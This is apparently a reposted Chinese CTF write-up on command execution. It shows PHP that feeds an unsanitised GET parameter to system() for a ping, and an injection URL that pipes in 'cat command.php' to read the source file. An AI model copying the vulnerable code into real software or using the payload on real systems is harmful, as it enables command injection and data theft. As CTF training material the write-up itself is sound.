【CTF WEB】命令执行

本文转载自查看原文 2018-09-29 14:01 1474 8_CTF

命令执行

找到题目中的KEY

KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。

漏洞代码

<?php 
system("ping -c 2 ".$_GET['ip']);
?>

http://localhost/command.php?ip=127.0.0.1|cat command.php

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 ctf-web-web安全命令执行漏洞-思路笔记命令执行_CTF Show CTF 命令执行 ctf命令执行(总结) CTF中的命令执行绕过 CTF练习三 —— 命令注入&命令执行绕过 ctf-ping命令执行绕过 CTF—攻防练习之HTTP—命令执行漏洞 CTF中的命令执行绕过方式 CTF中的命令执行绕过方式